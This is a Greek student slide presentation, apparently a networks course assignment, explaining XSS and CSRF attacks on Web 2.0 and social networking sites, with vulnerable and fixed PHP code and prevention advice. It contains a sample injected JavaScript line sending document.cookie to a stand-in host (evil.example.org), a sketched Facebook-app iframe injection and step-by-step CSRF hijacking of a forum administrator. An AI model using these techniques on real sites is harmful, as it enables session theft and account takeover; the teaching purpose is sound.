«Αντί-κοινωνική Δικτύωση» Εκμετάλλευση της εμπιστοσύνης των ιστοσελίδων σε περιβάλλον WEB 2.0.

Slides:



Advertisements
Παρόμοιες παρουσιάσεις
Support.ebsco.com Εκπαιδευτικό μάθημα για το Δικό μου EBSCOhost Εκπαιδευτικό μάθημα.
Advertisements

Διαδικτυακός εκφοβισμός
ΕΝΟΧΛΗΤΙΚΗ ΑΛΛΗΛΟΓΡΑΦΙΑ(SPAMING)
Η νέα Πύλη eTwinning Εργαλεία για την κοινωνική δικτύωση και την επικοινωνία των εκπαιδευτικών Εργαλεία διαχείρισης ενός έργου eTwinning.
Τεχνικές Προγραμματισμού με την JavaScript Στυλιάδης Κων/νος Φλώρινα, Οκτώβριος 2004.
Διαδίκτυο Κίκα Χρυσοστόμου.
Γονικός έλεγχος Κ. Ξ. Γ. «ΛΙΟΛΙΟΥ». Γονικός έλεγχος •Ακόμη κι όταν δεν κρυφοκοιτάζετε, μπορείτε να θέσετε περιορισμούς στη χρήση του υπολογιστή από τα.
Joomla.
ShareIt Social Network Project Simos Hatzikostas: Manolhs Georgiou: Theodoros Demetriou:
Copyright ©: SAMSUNG & Samsung Hope for Youth. Με επιφύλαξη κάθε νόμιμου δικαιώματος Εκπαιδευτικό υλικό Το Internet: Δημιουργία λογαριασμού .
• Php • Joomla • Joomla Module • Παρουσίαση του συστήματος μας.
Οι εκπαιδευτικοί: Τουλιόπουλος Φώτης
5η Συνάντηση Εκπαιδευτικών Πληροφορικής στη Δυτική Μακεδονία Πτολεμαΐδα, 29 Σεπτ 2005 Δημιουργία Δυναμικών Ιστοσελίδων με PHP και Dreamweaver MX Στυλιάδης.
Team Members Αριστοτέλης Στυλιανού ΑΔΤ: Σοφοκλής Χατζημιχαήλ ΑΔΤ: Κυριάκος Χριστοδούλου ΑΔΤ: Instructor: Evaggelia Pitoura EPL 602.
Ιδιωτικότητα Πληροφοριών στο Facebook Τα δεδομένα δεκάδων εκατομμυρίων χρηστών του Facebook, τα στοιχεία των οποίων έχουν περιέλθει εν αγνοία τους σε.
Copyright ©: SAMSUNG & Samsung Hope for Youth. Με επιφύλαξη κάθε νόμιμου δικαιώματος Εκπαιδευτικό υλικό Λογισμικό: Εύρεση και εγκατάσταση λογισμικού.
JToNic H φυσική λύση για το πρόβλημα της ψηφιοποίησης και της τεκμηρίωσης στην εταιρεία σας... (εισάγεται από την Ιταλία)
FACEBOOK • Το Facebook χώρος κοινωνικής δικτύωσης που ξεκίνησε το Φεβρουαρίου του 2004 από το δημιουργό του Mark Zuckerberg που ήταν μέλος του πανεπιστημίου.
Καλώς ήρθατε ! Ετοιμάζεστε να παρακολουθήσετε την παρουσίαση της εφαρμογής Copyright © iBS LTD, all rights reserved.
Τομέας Πληροφορικής ΙΕΚ ΔΕΛΤΑ Θεσσαλονίκη - Ιωάννινα
Copyright ©: SAMSUNG & Samsung Hope for Youth. Με επιφύλαξη κάθε νόμιμου δικαιώματος Εκπαιδευτικό υλικό Το Internet: Εύρεση πληροφοριών Επίπεδο.
Δημιουργία Λογαριασμού
Ηλεκτρονικό Ταχυδρομείο
Εισαγωγικά θέματα www Phishing Βλαχάκου Σταυρούλα ΜΠΣ Δυνητικές κοινότητες – Πάντειο Πανεπιστήμιο.
Εκπαιδευτικό μάθημα Εκπαιδευτικό μάθημα για το Δικό μου EBSCOhost
Εκπαιδευτικό μάθημα Δημιουργία Ειδοποιήσεων αναζητήσεων
Copyright ©: SAMSUNG & Samsung Hope for Youth. Με επιφύλαξη κάθε νόμιμου δικαιώματος Εκπαιδευτικό υλικό Το Internet: Ασφάλεια online Επίπεδο.
Εισαγωγή στο Διαδίκτυο Malware και η αντιμετώπισή του.
ΕΣΔ 232: Οργάνωση δεδομένων στην Κοινωνία της Πληροφορίας © 2013 Nicolas Tsapatsoulis Φόρμες Δημιουργία Περιεχομένου Ι.
Ηλεκτρονικός εκφοβισμός
Ιστοσελίδες -- Web-site. Εισαγωγή Στατικές ιστοσελίδες Δυναμικές ή Διαδραστικές ιστοσελίδες:  Ο τρόπος παρουσίασης και τα περιεχόμενά της ιστοσελίδας.
ΨΗΦΙΑΚΗ ΠΑΡΕΝΟΧΛΗΣΗ (CYBERBULLYING)
PHP/MYSQL ΠΑΡΟΥΣΙΑΣΗ ΣΤΑ ΠΛΑΙΣΙΑ ΤΟΥ ΜΑΘΗΜΑΤΟΣ ΕΠΟΙΚΟΙΝΩΝΙΑ ΑΝΘΡΩΠΟΥ-ΜΗΧΑΝΗΣ ΤΥΡΟΛΟΓΟΥ ΓΛΥΚΕΡΙΑ ΑΜ 875 ΡΙΖΟΥ ΔΕΣΠΟΙΝΑ ΑΜ 816.
H ηλεκτρονική παρενόχληση (cyberbullying) είναι η επιθετική συμπεριφορά από πρόθεση με τη χρήση ηλεκτρονικών μέσων. Τέτοιου είδους συμπεριφορές μπορεί.
Ορισμός Ο δούρειος ίππος είναι ένα πρόγραμμα κακόβουλου λογισμικού, το οποίο κρύβεται μέσα σε άλλα προγράμματα. Εισέρχεται σε έναν υπολογιστή κρυμμένο.
ΚΙΝΔΥΝΟΙ ΣΤΟ ΔΙΑΔΙΚΤΥΟ
Τα Ενδιαφέροντα των Νέων Σχέση των νέων με το internet Ονοματεπώνυμο: Χριστοδούλου Δημήτριος Τάξη: Β΄4 Μάθημα: project Υπεύθυνος μαθήματος: Μάμαλης Σπύρος.
Γιώργος Κωσταρέλας|Στέφανος Κεραμάρης|Κώστας Καλογερόπουλος Λευτέρης Κοτζαμπασούδης|Γιώργος Κουγιουμτζίδης|Δέσποινα Καραπέτσα.
Κουλίνας Μιχαήλ Α.Μ.:774 Μπουρνάζης Χρήστος Α.Μ.:792 Ρογκάκος Γεώργιος Α.Μ.:817.
ΤΟ ΔΙΑΔΙΚΤΥΟ, ΤΑ ΚΟΙΝΩΝΙΚΑ ΔΙΚΤΥΑ ΚΑΙ ΟΙ ΚΙΝΔΥΝΟΙ ΠΟΥ ΚΡΥΒΟΥΝ
ΟΜΑΔΑ Ά Θανάσης Μυλωνάς Γιάννης Παπαδημητρίου Χριστίνα Πουλουκτσή
Μάθετε τους κινδύνους και προστατέψτε εσάς και τα παιδιά σας.
ΟΜΑΔΑ:Ε.Π.Ε.Σ.Α Ανθή, Σέλφο, Ελένη, Παναγιώτα, (Έφη).
Διαδικτυακός εκφοβισμός. Τι είναι ο διαδικτυακός εκφοβισμός ;  Παρενόχληση  Απειλή  Ταπείνωση  Εκφοβισμός.
HTML-PHP Καμπέρης Άρης Α.Μ. 763 Zaher Owda Α.Μ. 849.
ΕΙΣΑΓΩΓΗ ΣΤΙΣ ΑΡΧΕΣ ΤΗΣ ΕΠΙΣΤΗΜΗΣ ΤΩΝ ΥΠΟΛΟΓΙΣΤΩΝ ΠΑΛΛΑΣ ΑΝΑΣΤΑΣΙΟΣ / ΦΕΒΡ ΚΕΦΑΛΑΙΟ 2 ΣΥΣΤΗΜΑΤΑ ΔΙΑΧΕΙΡΙΣΗΣ ΠΕΡΙΕΧΟΜΕΝΟΥ.
Πανεπιστήμιο Πειραιώς Τμήμα Διδακτικής της Τεχνολογίας & Ψηφιακών Συστημάτων Ζητήματα ασφάλειας στις εφαρμογές της ψηφιακής τηλεόρασης Σωκράτης Κ. Κάτσικας.
ΔΗΜΙΟΥΡΓΙΑ ΙΣΤΟΣΕΛΙΔΩΝ Ένας Συνοπτικός Οδηγός Καμήλαλη Δέσποινα Μαθηματικός, MSc Πληροφορικής, Υποψήφια Διδάκτωρ Χαροκοπείου Πανεπιστημίου Αθηνών.
Malware – Κακόβουλο Λογισμικό Σύντομη Παρουσίαση.
Λογισμικό Γονικού Ελέγχου
Ασφάλεια στο διαδίκτυο
Συμβουλές για ασφάλεια στο FACEBOOK
ΤΕΧΝΟΛΟΓΙΚΟ ΕΚΠΑΙΔΕΥΤΙΚΟ ΙΔΡΥΜΑ ΣΕΡΡΩΝ
Γνωριμία με το Λογισμικό του Υπολογιστή
Ας διαγράψουμε (delete) τον φόβο για το διαδίκτυο
Εργασία στο μάθημα «Προγραμματισμός ΙΙ»
Εισαγωγή στα Μέσα Κοινωνικής Δικτύωσης
Firewall Antivirus Antispyware Internet security
ΔΙΑΜΟΡΦΩΝΟΝΤΑΣ ΜΙΑ ΘΕΤΙΚΗ ΔΙΑΔΙΚΤΥΑΚΗ ΦΗΜΗ
AΣΦΑΛΕΙΑ ΣΤΟ ΔΙΑΔΙΚΤΥΟ
Υπηρεσίες του διαδικτύου
ΚΑΚΟΒΟΥΛΟ ΛΟΓΙΣΜΙΚΟ (ΟΡΙΣΜΟΣ) Κακόβουλο λογισμικό ονομάζεται το λογισμικό το οποίο εκ προθέσεως διαθέτει τις απαιτούμενες εντολές για να βλάψει ένα υπολογιστικό.
Web Services στη C# Εργαστήριο 3
Κακόβουλο ονομάζεται το λογισμικό που εκ προθέσεως δημιουργήθηκε για να βλάψει ένα υπολογιστικό σύστημα. Τα ψηφιακά αρχεία κινδυνεύουν να αλλοιωθούν,
Server-side vs Client-side
περιεχόμενα ΑΣΦΑΛΕΙΑ ΣΤΟ ΔΙΑΔΙΚΤΙΟ1 ΤΙ ΕΙΝΑΙ ΤΟ ΔΙΑΔΙΚΤΙΟ;
3ο Γυμνάσιο Νέας Φιλαδέλφειας
Εισαγωγή στην υλοποίηση δικτυακού τόπου
Λογισμικό Γονικού Ελέγχου
ΑΣΦΑΛΕΙΑ ΣΤΟΝ ΨΗΦΙΑΚΟ ΚΟΣΜΟ
Μεταγράφημα παρουσίασης:

«Αντί-κοινωνική Δικτύωση» Εκμετάλλευση της εμπιστοσύνης των ιστοσελίδων σε περιβάλλον WEB 2.0

Ελέυθερα API Οι Ιστότοποι κοινωνικής δικτύωσης έχουν δημιουργήσει ένα πολύ επικίνδυνο μίγμα αυτό των ανοιχτών API που κυκλοφορούν ελεύθερα για την ενσωμάτωση σε εφαρμογές τρίτων και την βαριά χρήση του κώδικα από την πλευρά του χρήστη.

XSS και CSRF XSS (Cross-site scripting ) είναι ένας τύπος ευπάθειας σε web εφαρμογές και επιτρέπει σε χρήστες να παρακάμψουν τους ελέγχους ασφαλείας και να προσθέσουν στην ιστοσελίδα κώδικα ο οποίος θα είναι ορατός από τους υπόλοιπους χρήστες. CSRF(Cross-site Request Forgeries ) το οποίο αφορά την εκτέλεση εντολών από χρήστη τον οποίο έχει εμπιστευτεί «κακώς» η ιστοσελίδα. Συχνά το συνδέουν με όρους της πιστοποίησης.

Cross-site scripting ‣ Εκμεταλλεύεται την εμπιστοσύνη Χρήστη/ περιηγητή σε μια τοποθεσία Web ‣ αφορούν συνήθως τοποθεσίες (φόρουμ, Web πελάτες ηλεκτρονικού ταχυδρομείου, RSS readers ) ‣ Εισάγουν το περιεχόμενο του εισβολέα κατ’ επιλογή. ‣ Σκοπός συνήθως είναι να αποκτήσουν πληροφορίες για έναν χρήστη.

Τυπική διαδικασία XSS ‣ Κακόβουλος χρήστης επισκέπτεται ευάλωτη σελίδα ‣ Κακόβουλος χρήστης εκμεταλλεύεται την αδυναμία της σελίδας τρέχοντας ένα javascript στην σελίδα. ‣ Ο κώδικας javascript που έτρεξε στην σελίδα στέλνει συνήθως πληροφορίες σε μια άλλη σελίδα ιδού και ο ορισμός Cross-site. ‣ Ένας αφελής χρήστης θα επισκεφθεί την ευάλωτη περιοχή ‣ Αυτός τρέχει την σελίδα με το κακόβουλο λογισμικό χωρίς να το καταλάβει. ‣ Τελικά οι πληροφορίες του στέλνονται στους κακόβουλους χρήστες εν’ αγνοία τους.

Κώδικας σελίδας Κώδικας Φόρμας Αποστολής Κώδικας Που λαμβάνει τα δεδομένα <?php if (isset($_POST['message'])) { file_put_contents('board.txt', "{$_POST['message']} ", FILE_APPEND); } $messages = file_get_contents('board.txt'); echo $messages; ?> Κώδικας Που ενσωματώνει ο Κακόβουλος χρήστης. document.location = ' evil.example.org/steal_cookies.php? cookies=' + document.cookie

Πρόληψη XSS ‣ Φιλτράρισμα στα εισερχόμενα δεδομένα - για να εξασφαλίστει ότι αυτά που έχουν εισαχθεί είναι τα αναμενόμενα ‣ Χρησιμοποιήστε μια προσέγγιση τύπου whitelist (Μόνο επιτρεπόμενες τιμές) ‣ Χρησιμοποιούμε έναν αυστηρό τρόπο ονοματοδωσίας μεταβλητών ‣ Να χρησιμοποιούμε δικές μας PHP ή ASP functions έτσι ώστε να αποφύγουμε την εκροή δεδομένων που πρέπει να μείνουν κρυφά στην σελίδα. Παράδειγμα ποιο ασφαλούς κώδικα <?php if (isset($_POST['message'])) { file_put_contents('board.txt', "{$_POST['message']} ", FILE_APPEND); } $messages = file_get_contents('board.txt'); echo htmlentities($messages); ?>

Cross Site Request Forgery ‣ Εκμεταλλεύεται ότι εμπιστεύεται ο χρήστης μια ιστοσελίδα ‣ Συνήθως συμβαίνει σε σελίδες με ταυτοποίηση χρηστών ‣ Ο εισβολέας πραγματοποιεί επιθέσεις HTTP ‣ Σκοπός είναι να ξεγελάσει τον χρήστη εκτελώντας ενα HTTP request

Τυπική διαδικασία CSRF ‣ Ο κακόβουλος χρήστης επισκέπτεται ευάλωτη περιοχή ‣ Ο κακόβουλος χρήστης στέλνει ένα HTTP request με ένα IMG TAG ή οποιονδήποτε άλλο κώδικα επιθυμεί ‣ Ο κώδικας δημοσιεύεται και εκμεταλλεύεται την δυνατότητα να στέλνει πληροφορίες κάθε φορά που εκτελείτε σε άλλη σελίδα. ‣ Ο καλός χρήστης θα επισκεφθεί την ευάλωτη ιστοσελίδα ‣ Ο καλός χρήστης χρήστη φορτώνει την σελίδα που έχει εμπλουτιστεί με βλαβερό κώδικα ‣ Ο καλός χρήστης προκαλεί εν’ αγνοία του ένα HTTP request να σταλεί σε άλλη σελίδα. Σημ: Οι περιηγητές δεν περιορίζουν την ετικέτα IMG να συγκεκριμένους τύπους εικόνας. Η IMG ετικέτα θα μπορούσε να δείξει μια σελίδα αντί για μια Εικόνα.

Πρόληψη CSRF ‣ Χρήση POST αντί GET σε φόρμες ‣ Χρησιμοποιήούμε $ _POST και όχι register_globals. ‣ Δεν δίνουμε έμφαση στην ευκολία ‣ Προσπαθούμε να αποφεύγουμε έτοιμες φόρμες και δημιουργούμε τις δικές μας.

Ευπάθεια σε Ιστοσελίδες κοινωνικής Δικτύωσης 1 Πολλές από τις εφαρμογές του Facebook, ακόμα και αυτά που χρησιμοποιούνται ευρέως είναι φαινομενικά αξιόπιστα αλλά υπάρχει έλλειψη βασικές προφυλάξεις ασφάλειας. 2 Συγκεκριμένα εξαιτίας του cross-site scripting βρέθηκαν κενά ασφαλείας σε ένα ευρύ φάσμα εφαρμογών του Facebook. 3. Κάθε τέτοια κενά ασφαλείας μπορεί να αξιοποιηθουν για να εκτελέσουν κακόβουλα JavaScript, όπως η παροχή malware (Επίσης, ως Malware χαρακτηρίζεται και το λεγόμενο Scumware. To Scumware αλλάζει τον τρόπο, με τον οποίο βλέπουμε τους ιστοχώρους που επισκέπτεστε. Αντικαθιστά το πραγματικό περιεχόμενο με διαφημίσεις από τους διαφημιστές scumware.) 4. Επιπλέον, οι τρύπες επιτρέπουν σε έναν εισβολέα να αποκτήσει πρόσβαση προφίλ πληροφορίες, συμπεριλαμβανομένων των προσωπικών στοιχείων, ενημερώσεις κατάστασης, και φωτογραφίες, με θύμα τον χρήστη και τους φίλους του. 5. Επιπλέον, κενά ασφάλειας μπορεί να χρησιμοποιηθούν για να στείλουν τις κοινοποιήσεις με συνδέσμους που περιέχουν ιούς. 6. Όλα τα τρωτά σημεία που αναφέρθηκαν στη σειρά έχουν επιδιορθωθεί, αλλά οι επιθέσεις που εκμεταλλεύονται τα κενά εφαρμογής, είναι εφικτή ακόμη και σήμερα.

Facebook και κενά Ασφαλείας Στο Facebook η εφαρμογή "Faceplant" περιλαμβάνει μια παράμετρο "ref" στην αρχική της σελίδα, δηλαδή f=install. Έχουμε δηλαδή τον σύνδεσμο της εφαρμογής. Τέλος, ας υποθέσουμε ότι στην αίτηση δεν φιλτράρουν τη "ref" παράμετρο π.χ. τον κώδικα PHP echo ‘ ’;. Όπως μπορείτε πιθανώς να δούμε, η "ref" παράμετρος εισάγει ένα cross-site scripting κενό ασφαλείας. Για παράδειγμα, η φόρτωση της σελίδας f = "> θα έδειχνε μια εικόνα κατά την φόρτωση της σελίδας. Υποθέτοντας ότι το Faceplant είναι μια εφαρμογή FBML( Facebook Markup Language), θα μπορούσε κανείς να φορτώσει ένα URI παρόμοια με f = "> src= <fb:iframe με αυτό τον τρόπο μπορεί να ενσωματώσει ένα iframe εντός της σελίδας. Δεδομένου ότι η πηγή των iframes είναι αυθαίρετη, θα μπορούσε κανείς να φορτώσει μια σελίδα που εκτελεί κακόβουλες δέσμες ενεργειών, όπως η παροχή κακόβουλο λογισμικό ή εκμετάλλευση του προγράμματος περιήγησης.

Απλό Παράδειγμα απλής Επίθεσης CSRF σε Forum κοινωνικής Δικτύωσης Αναλαμβάνουμε ρόλους Admin Πρόσβαση σε Cookies του Admin φτιάχνουμε μόνοι μας ένα πρόγραμμα ή μια εντολή η οποία είναι η ίδια που εκτελείται από το forum όταν ο πραγματικός διαχειριστής θέλει να κάνει κάποια ενέργεια (βοήθεια με το Live Http Headers του firefox) Αφού την φτιάξουμε θα την βάλουμε σε ένα link το οποίο με κάποιο τρόπο θα στείλουμε στον διαχειριστή και θα τον ωθήσουμε να το πατήσει (με την θέληση του ή μη). Ενσωματώνουμε το HTTP request σε μια εικόνα Όταν τρέξει την σελίδα μας θα οδηγηθεί εκεί και θα εκτελεστεί η εντολή μας. Ο server θα διαβάσει το cookie του Admin και θα εκτελέσει την εντολή με δικαιώματα διαχειριστή. Αυτό είναι ένα απλό παράδειγμα όταν γίνεται χρήση των μεταβλητών GET.

Paypal API XSS Πρέπει να σημειωθεί αν και δεν κατατάσσεται στην κατηγορία των ιστοσελίδων κοινωνικής δικτύωσης, ότι ίδιου τύπου επιθέσεις εκμεταλλευόμενοι το κενό ασφαλείας XSS (Cross-site scripting) Hackers έχουν επιτεθεί σε ιστοσελίδες οι οποίες δουλεύουν με το API της Paypal ( και προσθέτοντας το δικό τους περιεχόμενο στις σελίδες αυτές κατάφεραν να κλέβουν πιστοποιήσεις από τους χρήστες. Το ζουμί της υπόθεσης είναι ότι οι σελίδες βρίσκονταν σε Server ο οποίος είχε ενεργοποιημένο το SSL πιστοποιητικό ασφάλειας το οποίο πιστοποιητικό το έβλεπαν οι χρήστες (με την πράσινη ένδειξη στον browser και με το σύμβολο της κλειδαριάς) και πίστευαν ότι τα στοιχεία τους είναι ασφαλή. Ενώ τα πιστοποιητικά SSL παρέχουν όντως ένα υψηλότερο επίπεδο αξιοπιστίας όσον αφορά την κυριότητα της ιστοσελίδας, δεν μπορουν να εγγυηθούν ότι η ιστοσελίδα είναι απαλλαγμένη από άλλα προβλήματα ασφαλείας - συμπεριλαμβανομένων των scripting cross-site. Υπάρχουν ανησυχίες ότι οι χάκερ μπορούν να εκμεταλλευτούν τη σημασία της πράσινης γραμμής διευθύνσεων για δικό τους όφελος. Οι χρήστες πρέπει να γνωρίζουν ότι μια πράσινη γραμμή διευθύνσεων δεν εγγυάται την προέλευση του περιεχομένου μιας σελίδας, εάν υπάρχει μια cross-site scripting ευπάθεια σε αυτήν τη σελίδα.

Σας Ευχαριστώ «Αντί-κοινωνική Δικτύωση» Εκμετάλλευση της εμπιστοσύνης των ιστοσελίδων σε περιβάλλον WEB 2.0 Εργασία Δικτύων 3 ΑΜ:2211 Ονομ/πωνυμο:Γιώργος Γεωργιάδης Εξάμηνο:7ο